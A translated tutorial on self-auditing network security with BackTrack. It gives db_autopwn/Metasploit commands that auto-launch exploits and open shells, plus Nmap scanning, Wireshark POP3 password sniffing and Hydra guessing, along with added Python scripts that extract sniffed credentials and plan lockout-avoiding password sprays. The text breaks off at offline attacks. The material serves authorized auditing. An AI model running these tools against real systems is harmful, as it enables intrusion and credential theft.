Perform a security audit yourself, as a white hat hacker would

Source: Internet
Author: User

Huang Yongbing

It is important to ensure the security of the servers, PCs and laptops in your organization. Once that security is compromised, the important data stored on these devices may be destroyed or modified, which can mean lost customer confidence and lost sales orders. Is the enterprise network you manage really secure? Can you answer that with confidence? If not, why not perform a security audit and let the facts speak?

A full security audit is often out of reach for an enterprise: the price a security company charges may be too high, or the final audit report may turn out to be thin on substance. In this article we use open-source software to audit security from several angles. We cannot guarantee that such an audit will find everything, but it is at least better than guessing at the answer.

Existing protection measures

Before starting the audit, first establish what protective measures are already in place in your network environment. A small or medium-sized enterprise will generally have:

(1) A firewall that isolates the internal enterprise network from the Internet.
(2) An Intrusion Prevention System (IPS) or Intrusion Detection System (IDS) that raises an alarm automatically when it detects an attack.
(3) A malware scanner that checks the network for malware.
(4) Password authentication for access to the network and to computers, so that nothing can be reached directly without a password.
(5) Networked or stand-alone anti-virus software to detect and remove the viruses currently in circulation.

Perhaps your network does not have all of these measures, which is reason enough for a security audit. Even where they are all in place, security risks can remain, for example:

(1) A vulnerability has been discovered in the firewall, but you have not installed the patch promptly.
(2) The IPS/IDS is misconfigured, so it either does nothing or causes problems of its own.
(3) The passwords protecting network and computer resources are very weak, such as 123456.
(4) The anti-virus software has not been updated for a long time and cannot detect the latest viruses.
(5) Other vulnerabilities you have not discovered may exist elsewhere in your IT infrastructure.

Penetration Test

Let us start with penetration testing, which shows whether the existing protective measures actually protect the network. A penetration test means putting yourself in the attacker's position and using real attack techniques to launch simulated attacks against the network.

Penetration Testing usually involves several steps:

(1) Information Collection

Use search engines and other resources to gather as much information about the company as possible, such as the company name and employee names.

(2) Port Scanning

Use an automated port scanner to find live hosts on the network and the services they run, paying particular attention to services with known vulnerabilities.

(3) Investigation

Probe the target servers for details such as the programs and background services they run.

(4) network sniffing

Capture user names and passwords transmitted over the network.

(5) password attacks

Crack or guess passwords.

Because defending a network and attacking one are different disciplines, a penetration tester has to switch to an attacker's way of thinking. The best penetration test is one performed by a hired security expert, but that costs money. For cost reasons you can instead use penetration testing software, which searches the network for vulnerabilities and in some cases launches simulated attacks automatically. With software you can run a test every month or even every week.

So how do we actually perform a penetration test? First, prepare a laptop that can connect to the wireless or wired network. Then we need the software. Most of the software described in this article is open source and runs on Linux. The simplest approach is to download a LiveCD; this article uses the security-focused Linux distribution BackTrack, which you can download from www.remote-exploit.org. The steps for building the LiveCD are not described here. This distribution contains many penetration testing tools; the following are some examples:

Use db_autopwn for penetration testing

db_autopwn is an automated penetration testing tool that tests Windows, Linux and Unix computers on the network for vulnerabilities. It is in fact a component of the Metasploit Framework.

Before using db_autopwn, you must first scan the computers on the network with the well-known Nmap. Using the scan results, db_autopwn matches the open services against the exploits in the Metasploit module library and automatically launches the corresponding exploit. If an exploit succeeds, the host is "pwned" and you obtain a system shell on it.

db_autopwn has many advantages: it is widely used in the hacking community and it is free. Once it has found a vulnerability you can apply the remedy, patch the system promptly and then test again. Be aware, however, of two limitations: it cannot detect a vulnerable service that is not running on its default port, and launching real exploits can cause accidents, such as crashing the server, so run it in a maintenance window and only against systems you are authorized to test.

The specific steps are as follows:

# cd /pentest/exploits/framework3 (go to the Metasploit Framework folder)
# ./msfconsole (start Metasploit)
# load db_sqlite3 (load the SQLite database plugin)
# db_create nmapresults (create the database that stores the scan results)
# db_nmap [target] (scan the target host; replace [target] with the actual IP address of the target host)
# db_autopwn -t -p -e (list matching exploits, select them by open port, and launch them against the default ports)
# sessions -l (list the sessions opened on vulnerable computers)
# sessions -i 1 (interact with session 1; the number is the session ID from the list, not a count of computers)

You are then dropped into a command prompt on the target, for example:
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Use Nmap to scan the network

db_autopwn is the kind of tool used even by people with no technical skill, who are usually called "script kiddies". Beyond such one-click tools, the methods below are what is actually used in practice.

Attackers often scan the target network to see which computers are connected and which ports are open. The tool they generally use is Nmap, which db_autopwn already used above. Nmap itself is a command-line tool, but BackTrack 3 also integrates a graphical front end for it, i.e. Zenmap.

In the BackTrack 3 run box, enter zenmap to start Zenmap. In the Target field, enter the IP address or subnet range of the target systems, such as 192.168.1.*, then select one of the preset scan profiles, keeping the default scan intensity, and click the Scan button. The results appear within a few minutes.

The list on the left shows the hosts found on the network, with different icons indicating the operating system type. The list on the right shows the ports open on the selected host and the corresponding services. If you see port 3389 open, the host is most likely running Windows with Terminal Services (Remote Desktop) enabled; exploits exist for many such exposed services, so every open port deserves scrutiny.
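The Nmap scan is the input to both the db_autopwn procedure above and the Zenmap walkthrough here, and on anything larger than a handful of hosts you will want to process its output rather than read it by eye. The following is an added example, not code from the original article or from Nmap: it parses the XML that Nmap writes with its -oX option, lists the open ports of every host that is up, and applies the article's rule of thumb that an open 3389/tcp indicates Windows Terminal Services. The XML document, the hosts in it and the table of "interesting" ports are constructed for illustration, not a real scan.

```python
"""Parse Nmap XML output (nmap -oX) and flag hosts exposing services worth a closer look.

Added example, not part of the original article. It assumes you ran something like
`nmap -sV -oX scan.xml 192.168.1.0/24` and feeds the resulting XML to parse_nmap_xml().
The XML below is constructed for demonstration, not a real scan.
"""
import xml.etree.ElementTree as ET

# Ports the article singles out (3389) plus a few other cleartext or commonly exploited
# services; which ports matter is an assumption you should adapt to your own network.
INTERESTING_PORTS = {
    21: "ftp (cleartext credentials)",
    23: "telnet (cleartext credentials)",
    110: "pop3 (cleartext credentials unless STARTTLS is used)",
    445: "microsoft-ds (SMB)",
    3389: "ms-wbt-server (Windows Terminal Services / Remote Desktop)",
}

# Constructed sample in the layout Nmap actually writes: nmaprun > host > status/address/ports.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.168.1.0/24">
  <host><status state="up"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.1.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="110"><state state="open"/><service name="pop3"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host><status state="down"/>
    <address addr="192.168.1.30" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ip: [(port, proto, service, product), ...]} for every host that is up,
    keeping only the ports Nmap reported as open (closed and filtered ports are dropped)."""
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = None
        for a in host.findall("address"):
            if a.get("addrtype") == "ipv4":
                addr = a.get("addr")
        if addr is None:
            continue
        open_ports = []
        ports = host.find("ports")
        if ports is not None:
            for p in ports.findall("port"):
                state = p.find("state")
                if state is None or state.get("state") != "open":
                    continue
                svc = p.find("service")
                name = svc.get("name", "") if svc is not None else ""
                product = svc.get("product", "") if svc is not None else ""
                open_ports.append((int(p.get("portid")), p.get("protocol"), name, product))
        hosts[addr] = sorted(open_ports)
    return hosts


def findings(hosts):
    """Map each host to the open ports, with a reason, that deserve follow-up."""
    out = {}
    for ip, ports in hosts.items():
        hits = [(port, INTERESTING_PORTS[port]) for port, _proto, _name, _prod in ports
                if port in INTERESTING_PORTS]
        if hits:
            out[ip] = hits
    return out


def likely_windows(hosts):
    """Hosts with 3389/tcp open: the article's rule of thumb for Windows with Terminal Services."""
    return sorted(ip for ip, ports in hosts.items() if any(p[0] == 3389 for p in ports))


if __name__ == "__main__":
    scanned = parse_nmap_xml(SAMPLE_NMAP_XML)
    for ip, hits in findings(scanned).items():
        for port, why in hits:
            print(f"{ip}:{port} open - {why}")
    print("likely Windows (3389 open):", likely_windows(scanned))
```

Note that the closed 3389 on 192.168.1.20 is dropped, and the host that is down is not reported at all, so the output only ever lists ports an attacker could actually connect to.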

Wireshark sniffing network

Nmap gives a clear list of hosts and open ports, but it cannot show packet contents or the sensitive information transmitted across the network. For that we turn to Wireshark, the well-known open-source network protocol analyzer formerly named Ethereal, or, in plain terms, a network sniffer.

Before you start sniffing with Wireshark, choose the network location of the test machine carefully, because a switch forwards traffic only to the port connected to the destination host; in the wrong location you can sniff for a long time and capture nothing. So before you begin, understand your network layout and hardware. Note that some devices sold as hubs behave like switches, so do not assume that plugging into a hub is enough to see all traffic.

To make the test practical, it is best to use a switch with a monitoring (mirror or SPAN) port, which copies all packets passing through the switch to that port. Hackers like Wireshark because it can sniff user names and plaintext passwords. Many people set their password to the same value as their user name, or reuse the same password across several systems, which gives the attacker an opening. Wireshark can decode most network application protocols, including MSN Messenger conversations.

Below is a POP3 session I captured; the user name and password are in plain text. Well, you know what needs to happen next.

[Figure 1: the captured POP3 session, showing the user name and password in plain text]
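What the figure shows by hand can be automated: once a POP3 stream has been reassembled (Wireshark's "Follow TCP Stream" on port 110 traffic gives exactly this view), pulling the credentials out is a few lines of parsing. The following is an added example, not code from the original article or from Wireshark. It handles the USER/PASS pair seen in the capture above and, going slightly beyond the figure, AUTH PLAIN, where the credentials are base64-encoded but still not encrypted. The two sessions, host name, mailboxes and passwords below are constructed for illustration.

```python
"""Pull log-in credentials out of a reassembled cleartext POP3 session.

Added example, not taken from the original article. It works on a (direction, line) list
of the kind Wireshark's "Follow TCP Stream" shows for port 110 traffic, and covers two
cases: the USER/PASS pair visible in the article's capture, and AUTH PLAIN, where the
credentials are base64-encoded but not encrypted. Both sample sessions are constructed;
the host, mailbox names and passwords are fictitious.
"""
import base64

# Constructed exchange 1: classic USER/PASS. "C" = client to server, "S" = server to client.
SAMPLE_STREAM = [
    ("S", "+OK POP3 server ready <1896.697170952@mail.example.test>"),
    ("C", "USER alice"),
    ("S", "+OK"),
    ("C", "PASS alice"),          # password identical to the user name, as the article warns
    ("S", "+OK Logged in."),
    ("C", "STAT"),
    ("S", "+OK 2 3052"),
    ("C", "QUIT"),
    ("S", "+OK Bye"),
]

# Constructed exchange 2: SASL PLAIN. The client sends base64("\0user\0password").
SAMPLE_STREAM_AUTH_PLAIN = [
    ("S", "+OK POP3 ready"),
    ("C", "AUTH PLAIN"),
    ("S", "+ "),
    ("C", base64.b64encode(b"\x00bob\x00Summer2009!").decode()),
    ("S", "+OK"),
    ("C", "QUIT"),
    ("S", "+OK Bye"),
]


def _decode_plain(b64):
    """Decode a SASL PLAIN blob into (user, password), or None if it is malformed."""
    try:
        fields = base64.b64decode(b64.strip(), validate=True).split(b"\x00")
        if len(fields) == 3:
            return fields[1].decode(), fields[2].decode()
    except (ValueError, UnicodeDecodeError):
        pass
    return None


def extract_pop3_credentials(stream):
    """Return [(user, password, method, accepted)] for every log-in seen in the stream.

    `accepted` is True when the server answered the PASS or AUTH exchange with +OK, which
    tells the analyst the sniffed pair is valid and not just a failed guess."""
    creds = []
    user = None
    pending = None          # (user, password, method) waiting for the server's verdict
    expect_plain = False    # the next client line is the AUTH PLAIN continuation blob
    for direction, line in stream:
        line = line.rstrip("\r\n")
        if direction == "C":
            if expect_plain:
                expect_plain = False
                decoded = _decode_plain(line)
                if decoded:
                    pending = (decoded[0], decoded[1], "AUTH PLAIN")
                continue
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                user = arg
            elif verb == "PASS" and user is not None:
                pending = (user, arg, "USER/PASS")
            elif verb == "AUTH" and arg.upper().startswith("PLAIN"):
                initial = arg.split(" ", 1)
                if len(initial) == 2:                   # blob sent on the AUTH line itself
                    decoded = _decode_plain(initial[1])
                    if decoded:
                        pending = (decoded[0], decoded[1], "AUTH PLAIN")
                else:
                    expect_plain = True
        elif pending is not None and line.startswith(("+OK", "-ERR")):
            creds.append(pending + (line.startswith("+OK"),))
            pending = None
    return creds


def password_equals_username(creds):
    """The habit the article calls out: accepted log-ins whose password is the user name."""
    return sorted({u for u, pw, _method, ok in creds if ok and u == pw})


if __name__ == "__main__":
    for stream in (SAMPLE_STREAM, SAMPLE_STREAM_AUTH_PLAIN):
        for user, pw, method, ok in extract_pop3_credentials(stream):
            print(f"{method}: {user} / {pw} ({'accepted' if ok else 'rejected'})")
```

The `accepted` flag is the detail worth keeping: a capture full of rejected PASS lines tells you someone is guessing, while an accepted one tells you exactly which password to rotate first. The fix on the server side is the same in both cases, POP3 over TLS (POP3S or STARTTLS), so that the stream Wireshark follows is unreadable.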

Use Hydra to check password security

Attackers have many ways to obtain an e-mail user name: searching the web, taking it from your company website, or simply phoning and asking. These days few people use their user name as their password, but some still do.

Hydra is a tool for checking password strength by attempting log-ins against a live service.

The procedure in BackTrack 3 is as follows:

(1) In the BackTrack 3 run box, enter xhydra to start Hydra's graphical interface.
(2) Select a protocol from the protocol list; many are supported, such as pop3, telnet, ftp, vnc, smtp and cisco auth.
(3) Select a target host or enter its IP address.
(4) Switch to the Passwords tab and enter a known user name in the Username box. If you do not know one, you can supply a user name dictionary file to guess from, but I do not recommend that unless you have plenty of time. Then enter the password you want to try in the Password box, which is useful for checking a single weak password; more generally, use a password dictionary by giving the location of the dictionary file in the Password List box.
(5) Switch to the Tuning tab and set the number of tasks, i.e. parallel log-in attempts. Keep it small, and keep the number of attempts per account below 5, because many systems lock an account after 5 failed log-ins.
(6) Switch to the Start tab and click Start. If the attack succeeds, a success message is displayed that includes the recovered password.
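The lockout warning in step (5) is the part people get wrong: the limit applies per account, so a dictionary of hundreds of passwords fired at one user will lock that user out long before it finishes, and a locked-out executive is a worse outcome for the auditor than an uncracked password. The following is an added example, not part of the original article and not Hydra's own code: it plans the attempt order for an online check so that every account stays below the threshold in a given lockout window, trying one password across all accounts before the next one. The user list, password list, threshold and the "truth" table used in the simulation are constructed for illustration.

```python
"""Plan an online password check so that no account trips the lockout threshold.

Added example, not part of the original article or of Hydra. It implements the article's
caveat: many systems lock an account after 5 failed log-ins, so a dictionary run against a
live service must be rate-limited per account, not just overall. The plan tries one
password across all accounts before moving to the next ("spray" order) and stops at
threshold-1 attempts per account in each lockout window, keeping one attempt in reserve
for the account's real owner. The lists and threshold below are constructed for illustration.
"""
from collections import Counter

USERS = ["alice", "bob", "carol"]
PASSWORDS = ["123456", "password", "alice", "bob", "carol", "Summer2009", "Welcome1"]
LOCKOUT_THRESHOLD = 5   # assumed policy: the 5th consecutive failure locks the account


def plan_attempts(users, passwords, threshold):
    """Return [(user, password), ...] in spray order, capped at threshold-1 per user."""
    per_user_cap = threshold - 1
    if per_user_cap <= 0:
        return []
    attempts, used = [], Counter()
    for pw in passwords:            # outer loop: password; inner loop: every account
        for u in users:
            if used[u] < per_user_cap:
                attempts.append((u, pw))
                used[u] += 1
    return attempts


def deferred_passwords(users, passwords, threshold):
    """Passwords that did not fit in this window and must wait until the counters reset."""
    tried = {pw for _, pw in plan_attempts(users, passwords, threshold)}
    return [pw for pw in passwords if pw not in tried]


def is_safe(attempts, threshold):
    """True when no account receives threshold or more attempts."""
    return all(n < threshold for n in Counter(u for u, _ in attempts).values())


def simulate(attempts, truth):
    """Run a plan against a constructed table of real passwords and report the hits."""
    return [(u, pw) for u, pw in attempts if truth.get(u) == pw]


if __name__ == "__main__":
    plan = plan_attempts(USERS, PASSWORDS, LOCKOUT_THRESHOLD)
    print(f"{len(plan)} attempts this window, safe={is_safe(plan, LOCKOUT_THRESHOLD)}")
    # Constructed "truth": alice uses her user name; bob's password is further down the list.
    print("hits:", simulate(plan, {"alice": "alice", "bob": "Welcome1"}))
    print("deferred to the next window:", deferred_passwords(USERS, PASSWORDS, LOCKOUT_THRESHOLD))
```

With a threshold of 5 the plan covers only the first four passwords per account; the rest are deferred until the lockout counters reset, which is what the Tuning tab cannot do for you. When driving Hydra from the command line the same discipline applies: keep -t (parallel tasks) low and split the password list across windows yourself, and run it only against accounts you are authorized to test.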

Use Offline Attacks to detect weak passwords

When a user logs on to a server and enters a password, the password is passed through a hash function.
